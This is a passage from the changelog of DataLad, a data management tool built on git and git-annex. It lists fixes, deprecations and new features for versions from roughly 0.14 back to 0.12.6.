([#5580][])\n\n- The test suite required updates for recent changes in PyGithub and\n git-annex. ([#5603][]) ([#5609][])\n\n## Enhancements and new features\n\n- The DataLad source repository has long had a\n tools/cmdline-completion helper. This functionality is now exposed\n as a command, `datalad shell-completion`. ([#5544][])\n\n\n# 0.14.2 (April 14, 2021) -- .\n\n## Fixes\n\n- [push][] now works bottom-up, pushing submodules first so that hooks\n on the remote can aggregate updated subdataset information. ([#5416][])\n\n- [run-procedure][] didn't ensure that the configuration of\n subdatasets was reloaded. ([#5552][])\n\n\n# 0.14.1 (April 01, 2021) -- .\n\n## Fixes\n\n- The recent default branch changes on GitHub's side can lead to\n \"git-annex\" being selected over \"master\" as the default branch on\n GitHub when setting up a sibling with [create-sibling-github][]. To\n work around this, the current branch is now pushed first.\n ([#5010][])\n\n- The logic for reading in a JSON line from git-annex failed if the\n response exceeded the buffer size (256 KB on *nix systems).\n\n- Calling [unlock][] with a path of \".\" from within an untracked\n subdataset incorrectly aborted, complaining that the \"dataset\n containing given paths is not underneath the reference dataset\".\n ([#5458][])\n\n- [clone][] didn't account for the possibility of multiple accessible\n ORA remotes or the fact that none of them may be associated with the\n RIA store being cloned. ([#5488][])\n\n- [create-sibling-ria][] didn't call `git update-server-info` after\n setting up the remote repository and, as a result, the repository\n couldn't be fetched until something else (e.g., a push) triggered a\n call to `git update-server-info`. ([#5531][])\n\n- The parser for git-config output didn't properly handle multi-line\n values and got thrown off by unexpected and unrelated lines. ([#5509][])\n\n- The 0.14 release introduced regressions in the handling of progress\n bars for git-annex actions, including collapsing progress bars for\n concurrent operations. ([#5421][]) ([#5438][])\n\n- [save][] failed if the user configured Git's `diff.ignoreSubmodules`\n to a non-default value. ([#5453][])\n\n- A interprocess lock is now used to prevent a race between checking\n for an SSH socket's existence and creating it. ([#5466][])\n\n- If a Python procedure script is executable, [run-procedure][]\n invokes it directly rather than passing it to `sys.executable`. The\n non-executable Python procedures that ship with DataLad now include\n shebangs so that invoking them has a chance of working on file\n systems that present all files as executable. ([#5436][])\n\n- DataLad's wrapper around `argparse` failed if an underscore was used\n in a positional argument. ([#5525][])\n\n## Enhancements and new features\n\n- DataLad's method for mapping environment variables to configuration\n options (e.g., `DATALAD_FOO_X__Y` to `datalad.foo.x-y`) doesn't work\n if the subsection name (\"FOO\") has an underscore. This limitation\n can be sidestepped with the new `DATALAD_CONFIG_OVERRIDES_JSON`\n environment variable, which can be set to a JSON record of\n configuration values. ([#5505][])\n\n\n# 0.14.0 (February 02, 2021) -- .\n\n## Major refactoring and deprecations\n\n- Git versions below v2.19.1 are no longer supported. ([#4650][])\n\n- The minimum git-annex version is still 7.20190503, but, if you're on\n Windows (or use adjusted branches in general), please upgrade to at\n least 8.20200330 but ideally 8.20210127 to get subdataset-related\n fixes. ([#4292][]) ([#5290][])\n\n- The minimum supported version of Python is now 3.6. ([#4879][])\n\n- [publish][] is now deprecated in favor of [push][]. It will be\n removed in the 0.15.0 release at the earliest.\n\n- A new command runner was added in v0.13. Functionality related to\n the old runner has now been removed: `Runner`, `GitRunner`, and\n `run_gitcommand_on_file_list_chunks` from the `datalad.cmd` module\n along with the `datalad.tests.protocolremote`,\n `datalad.cmd.protocol`, and `datalad.cmd.protocol.prefix`\n configuration options. ([#5229][])\n\n- The `--no-storage-sibling` switch of `create-sibling-ria` is\n deprecated in favor of `--storage-sibling=off` and will be removed\n in a later release. ([#5090][])\n\n- The `get_git_dir` static method of `GitRepo` is deprecated and will\n be removed in a later release. Use the `dot_git` attribute of an\n instance instead. ([#4597][])\n\n- The `ProcessAnnexProgressIndicators` helper from\n `datalad.support.annexrepo` has been removed. ([#5259][])\n\n- The `save` argument of [install][], a noop since v0.6.0, has been\n dropped. ([#5278][])\n\n- The `get_URLS` method of `AnnexCustomRemote` is deprecated and will\n be removed in a later release. ([#4955][])\n\n- `ConfigManager.get` now returns a single value rather than a tuple\n when there are multiple values for the same key, as very few callers\n correctly accounted for the possibility of a tuple return value.\n Callers can restore the old behavior by passing `get_all=True`.\n ([#4924][])\n\n- In 0.12.0, all of the `assure_*` functions in `datalad.utils` were\n renamed as `ensure_*`, keeping the old names around as compatibility\n aliases. The `assure_*` variants are now marked as deprecated and\n will be removed in a later release. ([#4908][])\n\n- The `datalad.interface.run` module, which was deprecated in 0.12.0\n and kept as a compatibility shim for `datalad.core.local.run`, has\n been removed. ([#4583][])\n\n- The `saver` argument of `datalad.core.local.run.run_command`, marked\n as obsolete in 0.12.0, has been removed. ([#4583][])\n\n- The `dataset_only` argument of the `ConfigManager` class was\n deprecated in 0.12 and has now been removed. ([#4828][])\n\n- The `linux_distribution_name`, `linux_distribution_release`, and\n `on_debian_wheezy` attributes in `datalad.utils` are no longer set\n at import time and will be removed in a later release. Use\n `datalad.utils.get_linux_distribution` instead. ([#4696][])\n\n- `datalad.distribution.clone`, which was marked as obsolete in v0.12\n in favor of `datalad.core.distributed.clone`, has been removed.\n ([#4904][])\n\n- `datalad.support.annexrepo.N_AUTO_JOBS`, announced as deprecated in\n v0.12.6, has been removed. ([#4904][])\n\n- The `compat` parameter of `GitRepo.get_submodules`, added in v0.12\n as a temporary compatibility layer, has been removed. ([#4904][])\n\n- The long-deprecated (and non-functional) `url` parameter of\n `GitRepo.__init__` has been removed. ([#5342][])\n\n## Fixes\n\n- Cloning onto a system that enters adjusted branches by default (as\n Windows does) did not properly record the clone URL. ([#5128][])\n\n- The RIA-specific handling after calling [clone][] was correctly\n triggered by `ria+http` URLs but not `ria+https` URLs. ([#4977][])\n\n- If the registered commit wasn't found when cloning a subdataset, the\n failed attempt was left around. ([#5391][])\n\n- The remote calls to `cp` and `chmod` in [create-sibling][] were not\n portable and failed on macOS. ([#5108][])\n\n- A more reliable check is now done to decide if configuration files\n need to be reloaded. ([#5276][])\n\n- The internal command runner's handling of the event loop has been\n improved to play nicer with outside applications and scripts that\n use asyncio. ([#5350][]) ([#5367][])\n\n## Enhancements and new features\n\n- The subdataset handling for adjusted branches, which is particularly\n important on Windows where git-annex enters an adjusted branch by\n default, has been improved. A core piece of the new approach is\n registering the commit of the primary branch, not its checked out\n adjusted branch, in the superdataset. Note: This means that `git\n status` will always consider a subdataset on an adjusted branch as\n dirty while `datalad status` will look more closely and see if the\n tip of the primary branch matches the registered commit.\n ([#5241][])\n\n- The performance of the [subdatasets][] command has been improved,\n with substantial speedups for recursive processing of many\n subdatasets. ([#4868][]) ([#5076][])\n\n- Adding new subdatasets via [save][] has been sped up. ([#4793][])\n\n- [get][], [save][], and [addurls][] gained support for parallel\n operations that can be enabled via the `--jobs` command-line option\n or the new `datalad.runtime.max-jobs` configuration option. ([#5022][])\n\n- [addurls][]\n - learned how to read data from standard input. ([#4669][])\n - now supports tab-separated input. ([#4845][])\n - now lets Python callers pass in a list of records rather than a\n file name. ([#5285][])\n - gained a `--drop-after` switch that signals to drop a file's\n content after downloading and adding it to the annex. ([#5081][])\n - is now able to construct a tree of files from known checksums\n without downloading content via its new `--key` option. ([#5184][])\n - records the URL file in the commit message as provided by the\n caller rather than using the resolved absolute path. ([#5091][])\n - is now speedier. ([#4867][]) ([#5022][])\n\n- [create-sibling-github][] learned how to create private repositories\n (thanks to Nolan Nichols). ([#4769][])\n\n- [create-sibling-ria][] gained a `--storage-sibling` option. When\n `--storage-sibling=only` is specified, the storage sibling is\n created without an accompanying Git sibling. This enables using\n hosts without Git installed for storage. ([#5090][])\n\n- The download machinery (and thus the `datalad` special remote)\n gained support for a new scheme, `shub://`, which follows the same\n format used by `singularity run` and friends. In contrast to the\n short-lived URLs obtained by querying Singularity Hub directly,\n `shub://` URLs are suitable for registering with git-annex. ([#4816][])\n\n- A provider is now included for https://registry-1.docker.io URLs.\n This is useful for storing an image's blobs in a dataset and\n registering the URLs with git-annex. ([#5129][])\n\n- The `add-readme` command now links to the [DataLad\n handbook][handbook] rather than <http://docs.datalad.org>. ([#4991][])\n\n- New option `datalad.locations.extra-procedures` specifies an\n additional location that should be searched for procedures. ([#5156][])\n\n- The class for handling configuration values, `ConfigManager`, now\n takes a lock before writes to allow for multiple processes to modify\n the configuration of a dataset. ([#4829][])\n\n- [clone][] now records the original, unresolved URL for a subdataset\n under `submodule.<name>.datalad-url` in the parent's .gitmodules,\n enabling later [get][] calls to use the original URL. This is\n particularly useful for `ria+` URLs. ([#5346][])\n\n- Installing a subdataset now uses custom handling rather than calling\n `git submodule update --init`. This avoids some locking issues when\n running [get][] in parallel and enables more accurate source URLs to\n be recorded. ([#4853][])\n\n- `GitRepo.get_content_info`, a helper that gets triggered by many\n commands, got faster by tweaking its `git ls-files` call. ([#5067][])\n\n- [wtf][] now includes credentials-related information (e.g. active\n backends) in the its output. ([#4982][])\n\n- The `call_git*` methods of `GitRepo` now have a `read_only`\n parameter. Callers can set this to `True` to promise that the\n provided command does not write to the repository, bypassing the\n cost of some checks and locking. ([#5070][])\n\n- New `call_annex*` methods in the `AnnexRepo` class provide an\n interface for running git-annex commands similar to that of the\n `GitRepo.call_git*` methods. ([#5163][])\n\n- It's now possible to register a custom metadata indexer that is\n discovered by [search][] and used to generate an index. ([#4963][])\n\n- The `ConfigManager` methods `get`, `getbool`, `getfloat`, and\n `getint` now return a single value (with same precedence as `git\n config --get`) when there are multiple values for the same key (in\n the non-committed git configuration, if the key is present there, or\n in the dataset configuration). For `get`, the old behavior can be\n restored by specifying `get_all=True`. ([#4924][])\n\n- Command-line scripts are now defined via the `entry_points` argument\n of `setuptools.setup` instead of the `scripts` argument. ([#4695][])\n\n- Interactive use of `--help` on the command-line now invokes a pager\n on more systems and installation setups. ([#5344][])\n\n- The `datalad` special remote now tries to eliminate some unnecessary\n interactions with git-annex by being smarter about how it queries\n for URLs associated with a key. ([#4955][])\n\n- The `GitRepo` class now does a better job of handling bare\n repositories, a step towards bare repositories support in DataLad.\n ([#4911][])\n\n- More internal work to move the code base over to the new command\n runner. ([#4699][]) ([#4855][]) ([#4900][]) ([#4996][]) ([#5002][])\n ([#5141][]) ([#5142][]) ([#5229][])\n\n\n# 0.13.7 (January 04, 2021) -- .\n\n## Fixes\n\n- Cloning from a RIA store on the local file system initialized annex\n in the Git sibling of the RIA source, which is problematic because\n all annex-related functionality should go through the storage\n sibling. [clone][] now sets `remote.origin.annex-ignore` to `true`\n after cloning from RIA stores to prevent this. ([#5255][])\n\n- [create-sibling][] invoked `cp` in a way that was not compatible\n with macOS. ([#5269][])\n\n- Due to a bug in older Git versions (before 2.25), calling [status][]\n with a file under .git/ (e.g., `datalad status .git/config`)\n incorrectly reported the file as untracked. A workaround has been\n added. ([#5258][])\n\n- Update tests for compatibility with latest git-annex. ([#5254][])\n\n## Enhancements and new features\n\n- [copy-file][] now aborts if .git/ is in the target directory, adding\n to its existing .git/ safety checks. ([#5258][])\n\n\n# 0.13.6 (December 14, 2020) -- .\n\n## Fixes\n\n- An assortment of fixes for Windows compatibility. ([#5113][]) ([#5119][])\n ([#5125][]) ([#5127][]) ([#5136][]) ([#5201][]) ([#5200][]) ([#5214][])\n\n- Adding a subdataset on a system that defaults to using an adjusted\n branch (i.e. doesn't support symlinks) didn't properly set up the\n submodule URL if the source dataset was not in an adjusted state.\n ([#5127][])\n\n- [push][] failed to push to a remote that did not have an\n `annex-uuid` value in the local `.git/config`. ([#5148][])\n\n- The default renderer has been improved to avoid a spurious leading\n space, which led to the displayed path being incorrect in some\n cases. ([#5121][])\n\n- [siblings][] showed an uninformative error message when asked to\n configure an unknown remote. ([#5146][])\n\n- [drop][] confusingly relayed a suggestion from `git annex drop` to\n use `--force`, an option that does not exist in `datalad drop`.\n ([#5194][])\n\n- [create-sibling-github][] no longer offers user/password\n authentication because it is no longer supported by GitHub.\n ([#5218][])\n\n- The internal command runner's handling of the event loop has been\n tweaked to hopefully fix issues with running DataLad from IPython.\n ([#5106][])\n\n- SSH cleanup wasn't reliably triggered by the ORA special remote on\n failure, leading to a stall with a particular version of git-annex,\n 8.20201103. (This is also resolved on git-annex's end as of\n 8.20201127.) ([#5151][])\n\n## Enhancements and new features\n\n- The credential helper no longer asks the user to repeat tokens or\n AWS keys. ([#5219][])\n\n- The new option `datalad.locations.sockets` controls where DataLad\n stores SSH sockets, allowing users to more easily work around file\n system and path length restrictions. ([#5238][])\n\n# 0.13.5 (October 30, 2020) -- .\n\n## Fixes\n\n- SSH connection handling has been reworked to fix cloning on Windows.\n A new configuration option, `datalad.ssh.multiplex-connections`,\n defaults to false on Windows. ([#5042][])\n\n- The ORA special remote and post-clone RIA configuration now provide\n authentication via DataLad's credential mechanism and better\n handling of HTTP status codes. ([#5025][]) ([#5026][])\n\n- By default, if a git executable is present in the same location as\n git-annex, DataLad modifies `PATH` when running git and git-annex so\n that the bundled git is used. This logic has been tightened to\n avoid unnecessarily adjusting the path, reducing the cases where the\n adjustment interferes with the local environment, such as special\n remotes in a virtual environment being masked by the system-wide\n variants. ([#5035][])\n\n- git-annex is now consistently invoked as \"git annex\" rather than\n \"git-annex\" to work around failures on Windows. ([#5001][])\n\n- [push][] called `git annex sync ...` on plain git repositories.\n ([#5051][])\n\n- [save][] in genernal doesn't support registering multiple levels of\n untracked subdatasets, but it can now properly register nested\n subdatasets when all of the subdataset paths are passed explicitly\n (e.g., `datalad save -d. sub-a sub-a/sub-b`). ([#5049][])\n\n- When called with `--sidecar` and `--explicit`, [run][] didn't save\n the sidecar. ([#5017][])\n\n- A couple of spots didn't properly quote format fields when combining\n substrings into a format string. ([#4957][])\n\n- The default credentials configured for `indi-s3` prevented anonymous\n access. ([#5045][])\n\n## Enhancements and new features\n\n- Messages about suppressed similar results are now rate limited to\n improve performance when there are many similar results coming\n through quickly. ([#5060][])\n\n- [create-sibling-github][] can now be told to replace an existing\n sibling by passing `--existing=replace`. ([#5008][])\n\n- Progress bars now react to changes in the terminal's width (requires\n tqdm 2.1 or later). ([#5057][])\n\n\n# 0.13.4 (October 6, 2020) -- .\n\n## Fixes\n\n- Ephemeral clones mishandled bare repositories. ([#4899][])\n\n- The post-clone logic for configuring RIA stores didn't consider\n `https://` URLs. ([#4977][])\n\n- DataLad custom remotes didn't escape newlines in messages sent to\n git-annex. ([#4926][])\n\n- The datalad-archives special remote incorrectly treated file names\n as percent-encoded. ([#4953][])\n\n- The result handler didn't properly escape \"%\" when constructing its\n message template. ([#4953][])\n\n- In v0.13.0, the tailored rendering for specific subtypes of external\n command failures (e.g., \"out of space\" or \"remote not available\")\n was unintentionally switched to the default rendering. ([#4966][])\n\n- Various fixes and updates for the NDA authenticator. ([#4824][])\n\n- The helper for getting a versioned S3 URL did not support anonymous\n access or buckets with \".\" in their name. ([#4985][])\n\n- Several issues with the handling of S3 credentials and token\n expiration have been addressed. ([#4927][]) ([#4931][]) ([#4952][])\n\n## Enhancements and new features\n\n- A warning is now given if the detected Git is below v2.13.0 to let\n users that run into problems know that their Git version is likely\n the culprit. ([#4866][])\n\n- A fix to [push][] in v0.13.2 introduced a regression that surfaces\n when `push.default` is configured to \"matching\" and prevents the\n git-annex branch from being pushed. Note that, as part of the fix,\n the current branch is now always pushed even when it wouldn't be\n based on the configured refspec or `push.default` value. ([#4896][])\n\n- [publish][]\n - now allows spelling the empty string value of `--since=` as `^`\n for consistency with [push][]. ([#4683][])\n - compares a revision given to `--since=` with `HEAD` rather than\n the working tree to speed up the operation. ([#4448][])\n\n- [rerun][]\n - emits more INFO-level log messages. ([#4764][])\n - provides better handling of adjusted branches and aborts with a\n clear error for cases that are not supported. ([#5328][])\n\n- The archives are handled with p7zip, if available, since DataLad\n v0.12.0. This implementation now supports .tgz and .tbz2 archives.\n ([#4877][])\n\n\n# 0.13.3 (August 28, 2020) -- .\n\n## Fixes\n\n- Work around a Python bug that led to our asyncio-based command\n runner intermittently failing to capture the output of commands that\n exit very quickly. ([#4835][])\n\n- [push][] displayed an overestimate of the transfer size when\n multiple files pointed to the same key. ([#4821][])\n\n- When [download-url][] calls `git annex addurl`, it catches and\n reports any failures rather than crashing. A change in v0.12.0\n broke this handling in a particular case. ([#4817][])\n\n## Enhancements and new features\n\n- The wrapper functions returned by decorators are now given more\n meaningful names to hopefully make tracebacks easier to digest.\n ([#4834][])\n\n\n# 0.13.2 (August 10, 2020) -- .\n\n## Deprecations\n\n- The `allow_quick` parameter of `AnnexRepo.file_has_content` and\n `AnnexRepo.is_under_annex` is now ignored and will be removed in a\n later release. This parameter was only relevant for git-annex\n versions before 7.20190912. ([#4736][])\n\n## Fixes\n\n- Updates for compatibility with recent git and git-annex releases.\n ([#4746][]) ([#4760][]) ([#4684][])\n\n- [push][] didn't sync the git-annex branch when `--data=nothing` was\n specified. ([#4786][])\n\n- The `datalad.clone.reckless` configuration wasn't stored in\n non-annex datasets, preventing the values from being inherited by\n annex subdatasets. ([#4749][])\n\n- Running the post-update hook installed by `create-sibling --ui`\n could overwrite web log files from previous runs in the unlikely\n event that the hook was executed multiple times in the same second.\n ([#4745][])\n\n- [clone][] inspected git's standard error in a way that could cause\n an attribute error. ([#4775][])\n\n- When cloning a repository whose `HEAD` points to a branch without\n commits, [clone][] tries to find a more useful branch to check out.\n It unwisely considered adjusted branches. ([#4792][])\n\n- Since v0.12.0, `SSHManager.close` hasn't closed connections when the\n `ctrl_path` argument was explicitly given. ([#4757][])\n\n- When working in a dataset in which `git annex init` had not yet been\n called, the `file_has_content` and `is_under_annex` methods of\n `AnnexRepo` incorrectly took the \"allow quick\" code path on file\n systems that did not support it ([#4736][])\n\n## Enhancements\n\n- [create][] now assigns version 4 (random) UUIDs instead of version 1\n UUIDs that encode the time and hardware address. ([#4790][])\n\n- The documentation for [create][] now does a better job of describing\n the interaction between `--dataset` and `PATH`. ([#4763][])\n\n- The `format_commit` and `get_hexsha` methods of `GitRepo` have been\n sped up. ([#4807][]) ([#4806][])\n\n- A better error message is now shown when the `^` or `^.` shortcuts\n for `--dataset` do not resolve to a dataset. ([#4759][])\n\n- A more helpful error message is now shown if a caller tries to\n download an `ftp://` link but does not have `request_ftp` installed.\n ([#4788][])\n\n- [clone][] now tries harder to get up-to-date availability\n information after auto-enabling `type=git` special remotes. ([#2897][])\n\n\n# 0.13.1 (July 17, 2020) -- .\n\n## Fixes\n\n- Cloning a subdataset should inherit the parent's\n `datalad.clone.reckless` value, but that did not happen when cloning\n via `datalad get` rather than `datalad install` or `datalad clone`.\n ([#4657][])\n\n- The default result renderer crashed when the result did not have a\n `path` key. ([#4666][]) ([#4673][])\n\n- `datalad push` didn't show information about `git push` errors when\n the output was not in the format that it expected. ([#4674][])\n\n- `datalad push` silently accepted an empty string for `--since` even\n though it is an invalid value. ([#4682][])\n\n- Our JavaScript testing setup on Travis grew stale and has now been\n updated. (Thanks to Xiao Gui.) ([#4687][])\n\n- The new class for running Git commands (added in v0.13.0) ignored\n any changes to the process environment that occurred after\n instantiation. ([#4703][])\n\n## Enhancements and new features\n\n- `datalad push` now avoids unnecessary `git push` dry runs and pushes\n all refspecs with a single `git push` call rather than invoking `git\n push` for each one. ([#4692][]) ([#4675][])\n\n- The readability of SSH error messages has been improved. ([#4729][])\n\n- `datalad.support.annexrepo` avoids calling\n `datalad.utils.get_linux_distribution` at import time and caches the\n result once it is called because, as of Python 3.8, the function\n uses `distro` underneath, adding noticeable overhead. ([#4696][])\n\n Third-party code should be updated to use `get_linux_distribution`\n directly in the unlikely event that the code relied on the\n import-time call to `get_linux_distribution` setting the\n `linux_distribution_name`, `linux_distribution_release`, or\n `on_debian_wheezy` attributes in `datalad.utils.\n\n\n# 0.13.0 (June 23, 2020) -- .\n\nA handful of new commands, including `copy-file`, `push`, and\n`create-sibling-ria`, along with various fixes and enhancements\n\n## Major refactoring and deprecations\n\n- The `no_annex` parameter of [create][], which is exposed in the\n Python API but not the command line, is deprecated and will be\n removed in a later release. Use the new `annex` argument instead,\n flipping the value. Command-line callers that use `--no-annex` are\n unaffected. ([#4321][])\n\n- `datalad add`, which was deprecated in 0.12.0, has been removed.\n ([#4158][]) ([#4319][])\n\n- The following `GitRepo` and `AnnexRepo` methods have been removed:\n `get_changed_files`, `get_missing_files`, and `get_deleted_files`.\n ([#4169][]) ([#4158][])\n\n- The `get_branch_commits` method of `GitRepo` and `AnnexRepo` has\n been renamed to `get_branch_commits_`. ([#3834][])\n\n- The custom `commit` method of `AnnexRepo` has been removed, and\n `AnnexRepo.commit` now resolves to the parent method,\n `GitRepo.commit`. ([#4168][])\n\n- GitPython's `git.repo.base.Repo` class is no longer available via\n the `.repo` attribute of `GitRepo` and `AnnexRepo`. ([#4172][])\n\n- `AnnexRepo.get_corresponding_branch` now returns `None` rather than\n the current branch name when a managed branch is not checked out.\n ([#4274][])\n\n- The special UUID for git-annex web remotes is now available as\n `datalad.consts.WEB_SPECIAL_REMOTE_UUID`. It remains accessible as\n `AnnexRepo.WEB_UUID` for compatibility, but new code should use\n `consts.WEB_SPECIAL_REMOTE_UUID` ([#4460][]).\n\n## Fixes\n\n- Widespread improvements in functionality and test coverage on\n Windows and crippled file systems in general. ([#4057][])\n ([#4245][]) ([#4268][]) ([#4276][]) ([#4291][]) ([#4296][])\n ([#4301][]) ([#4303][]) ([#4304][]) ([#4305][]) ([#4306][])\n\n- `AnnexRepo.get_size_from_key` incorrectly handled file chunks.\n ([#4081][])\n\n- [create-sibling][] would too readily clobber existing paths when\n called with `--existing=replace`. It now gets confirmation from the\n user before doing so if running interactively and unconditionally\n aborts when running non-interactively. ([#4147][])\n\n- [update][] ([#4159][])\n - queried the incorrect branch configuration when updating non-annex\n repositories.\n - didn't account for the fact that the local repository can be\n configured as the upstream \"remote\" for a branch.\n\n- When the caller included `--bare` as a `git init` option, [create][]\n crashed creating the bare repository, which is currently\n unsupported, rather than aborting with an informative error message.\n ([#4065][])\n\n- The logic for automatically propagating the 'origin' remote when\n cloning a local source could unintentionally trigger a fetch of a\n non-local remote. ([#4196][])\n\n- All remaining `get_submodules()` call sites that relied on the\n temporary compatibility layer added in v0.12.0 have been updated.\n ([#4348][])\n\n- The custom result summary renderer for [get][], which was visible\n with `--output-format=tailored`, displayed incorrect and confusing\n information in some cases. The custom renderer has been removed\n entirely. ([#4471][])\n\n- The documentation for the Python interface of a command listed an\n incorrect default when the command overrode the value of command\n parameters such as `result_renderer`. ([#4480][])\n\n## Enhancements and new features\n\n- The default result renderer learned to elide a chain of results\n after seeing ten consecutive results that it considers similar,\n which improves the display of actions that have many results (e.g.,\n saving hundreds of files). ([#4337][])\n\n- The default result renderer, in addition to \"tailored\" result\n renderer, now triggers the custom summary renderer, if any. ([#4338][])\n\n- The new command [create-sibling-ria][] provides support for creating\n a sibling in a [RIA store][handbook-scalable-datastore]. ([#4124][])\n\n- DataLad ships with a new special remote, git-annex-remote-ora, for\n interacting with [RIA stores][handbook-scalable-datastore] and a new\n command [export-archive-ora][] for exporting an archive from a local\n annex object store. ([#4260][]) ([#4203][])\n\n- The new command [push][] provides an alternative interface to\n [publish][] for pushing a dataset hierarchy to a sibling.\n ([#4206][]) ([#4581][]) ([#4617][]) ([#4620][])\n\n- The new command [copy-file][] copies files and associated\n availability information from one dataset to another. ([#4430][])\n\n- The command examples have been expanded and improved. ([#4091][])\n ([#4314][]) ([#4464][])\n\n- The tooling for linking to the [DataLad Handbook][handbook] from\n DataLad's documentation has been improved. ([#4046][])\n\n- The `--reckless` parameter of [clone][] and [install][] learned two\n new modes:\n - \"ephemeral\", where the .git/annex/ of the cloned repository is\n symlinked to the local source repository's. ([#4099][])\n - \"shared-{group|all|...}\" that can be used to set up datasets for\n collaborative write access. ([#4324][])\n\n- [clone][]\n - learned to handle dataset aliases in RIA stores when given a URL\n of the form `ria+<protocol>://<storelocation>#~<aliasname>`.\n ([#4459][])\n - now checks `datalad.get.subdataset-source-candidate-NAME` to see\n if `NAME` starts with three digits, which is taken as a \"cost\".\n Sources with lower costs will be tried first. ([#4619][])\n\n- [update][] ([#4167][])\n - learned to disallow non-fast-forward updates when `ff-only` is\n given to the `--merge` option.\n - gained a `--follow` option that controls how `--merge` behaves,\n adding support for merging in the revision that is registered in\n the parent dataset rather than merging in the configured branch\n from the sibling.\n - now provides a result record for merge events.\n\n- [create-sibling][] now supports local paths as targets in addition\n to SSH URLs. ([#4187][])\n\n- [siblings][] now\n - shows a warning if the caller requests to delete a sibling that\n does not exist. ([#4257][])\n - phrases its warning about non-annex repositories in a less\n alarming way. ([#4323][])\n\n- The rendering of command errors has been improved. ([#4157][])\n\n- [save][] now\n - displays a message to signal that the working tree is clean,\n making it more obvious that no results being rendered corresponds\n to a clean state. ([#4106][])\n - provides a stronger warning against using `--to-git`. ([#4290][])\n\n- [diff][] and [save][] learned about scenarios where they could avoid\n unnecessary and expensive work. ([#4526][]) ([#4544][]) ([#4549][])\n\n- Calling [diff][] without `--recursive` but with a path constraint\n within a subdataset (\"<subdataset>/<path>\") now traverses into the\n subdataset, as \"<subdataset>/\" would, restricting its report to\n \"<subdataset>/<path>\". ([#4235][])\n\n- New option `datalad.annex.retry` controls how many times git-annex\n will retry on a failed transfer. It defaults to 3 and can be set to\n 0 to restore the previous behavior. ([#4382][])\n\n- [wtf][] now warns when the specified dataset does not exist.\n ([#4331][])\n\n- The `repr` and `str` output of the dataset and repo classes got a\n facelift. ([#4420][]) ([#4435][]) ([#4439][])\n\n- The DataLad Singularity container now comes with p7zip-full.\n\n- DataLad emits a log message when the current working directory is\n resolved to a different location due to a symlink. This is now\n logged at the DEBUG rather than WARNING level, as it typically does\n not indicate a problem. ([#4426][])\n\n- DataLad now lets the caller know that `git annex init` is scanning\n for unlocked files, as this operation can be slow in some\n repositories. ([#4316][])\n\n- The `log_progress` helper learned how to set the starting point to a\n non-zero value and how to update the total of an existing progress\n bar, two features needed for planned improvements to how some\n commands display their progress. ([#4438][])\n\n- The `ExternalVersions` object, which is used to check versions of\n Python modules and external tools (e.g., git-annex), gained an `add`\n method that enables DataLad extensions and other third-party code to\n include other programs of interest. ([#4441][])\n\n- All of the remaining spots that use GitPython have been rewritten\n without it. Most notably, this includes rewrites of the `clone`,\n `fetch`, and `push` methods of `GitRepo`. ([#4080][]) ([#4087][])\n ([#4170][]) ([#4171][]) ([#4175][]) ([#4172][])\n\n- When `GitRepo.commit` splits its operation across multiple calls to\n avoid exceeding the maximum command line length, it now amends to\n initial commit rather than creating multiple commits. ([#4156][])\n\n- `GitRepo` gained a `get_corresponding_branch` method (which always\n returns None), allowing a caller to invoke the method without\n needing to check if the underlying repo class is `GitRepo` or\n `AnnexRepo`. ([#4274][])\n\n- A new helper function `datalad.core.local.repo.repo_from_path`\n returns a repo class for a specified path. ([#4273][])\n\n- New `AnnexRepo` method `localsync` performs a `git annex sync` that\n disables external interaction and is particularly useful for\n propagating changes on an adjusted branch back to the main branch.\n ([#4243][])\n\n\n# 0.12.7 (May 22, 2020) -- .\n\n## Fixes\n\n- Requesting tailored output (`--output=tailored`) from a command with\n a custom result summary renderer produced repeated output. ([#4463][])\n\n- A longstanding regression in argcomplete-based command-line\n completion for Bash has been fixed. You can enable completion by\n configuring a Bash startup file to run `eval\n \"$(register-python-argcomplete datalad)\"` or source DataLad's\n `tools/cmdline-completion`. The latter should work for Zsh as well.\n ([#4477][])\n\n- [publish][] didn't prevent `git-fetch` from recursing into\n submodules, leading to a failure when the registered submodule was\n not present locally and the submodule did not have a remote named\n 'origin'. ([#4560][])\n\n- [addurls][] botched path handling when the file name format started\n with \"./\" and the call was made from a subdirectory of the dataset.\n ([#4504][])\n\n- Double dash options in manpages were unintentionally escaped.\n ([#4332][])\n\n- The check for HTTP authentication failures crashed in situations\n where content came in as bytes rather than unicode. ([#4543][])\n\n- A check in `AnnexRepo.whereis` could lead to a type error. ([#4552][])\n\n- When installing a dataset to obtain a subdataset, [get][]\n confusingly displayed a message that described the containing\n dataset as \"underneath\" the subdataset. ([#4456][])\n\n- A couple of Makefile rules didn't properly quote paths. ([#4481][])\n\n- With DueCredit support enabled (`DUECREDIT_ENABLE=1`), the query for\n metadata information could flood the output with warnings if\n datasets didn't have aggregated metadata. The warnings are now\n silenced, with the overall failure of a [metadata][] call logged at\n the debug level. ([#4568][])\n\n## Enhancements and new features\n\n- The resource identifier helper learned to recognize URLs with\n embedded Git transport information, such as\n gcrypt::https://example.com. ([#4529][])\n\n- When running non-interactively, a more informative error is now\n signaled when the UI backend, which cannot display a question, is\n asked to do so. ([#4553][])\n\n\n# 0.12.6 (April 23, 2020) -- .\n\n## Major refactoring and deprecations\n\n- The value of `datalad.support.annexrep.N_AUTO_JOBS` is no longer\n considered. The variable will be removed in a later release.\n ([#4409][])\n\n## Fixes\n\n- Staring with v0.12.0, `datalad save` recorded the current branch of\n a parent dataset as the `branch` value in the .gitmodules entry for\n a subdataset. This behavior is problematic for a few reasons and\n has been reverted. ([#4375][])\n\n- The default for the `--jobs` option, \"auto\", instructed DataLad to\n pass a value to git-annex's `--jobs` equal to `min(8, max(3, <number\n of CPUs>))`, which could lead to issues due to the large number of\n child processes spawned and file descriptors opened. To avoid this\n behavior, `--jobs=auto` now results in git-annex being called with\n `--jobs=1` by default. Configure the new option\n `datalad.runtime.max-annex-jobs` to control the maximum value that\n will be considered when `--jobs='auto'`. ([#4409][])\n\n- Various commands have been adjusted to better handle the case where\n a remote's HEAD ref points to an unborn branch. ([#4370][])\n\n- [search]\n - learned to use the query as a regular expression that restricts\n the keys that are shown for `--show-keys short`. ([#4354][])\n - gives a more helpful message when query is an invalid regular\n expression. ([#4398][])\n\n- The code for parsing Git configuration did not follow Git's behavior\n of accepting a key with no value as shorthand for key=true. ([#4421][])\n\n- `AnnexRepo.info` needed a compatibility update for a change in how\n git-annex reports file names. ([#4431][])\n\n- [create-sibling-github][] did not gracefully handle a token that did\n not have the necessary permissions. ([#4400][])\n\n## Enhancements and new features\n\n- [search] learned to use the query as a regular expression that\n restricts the keys that 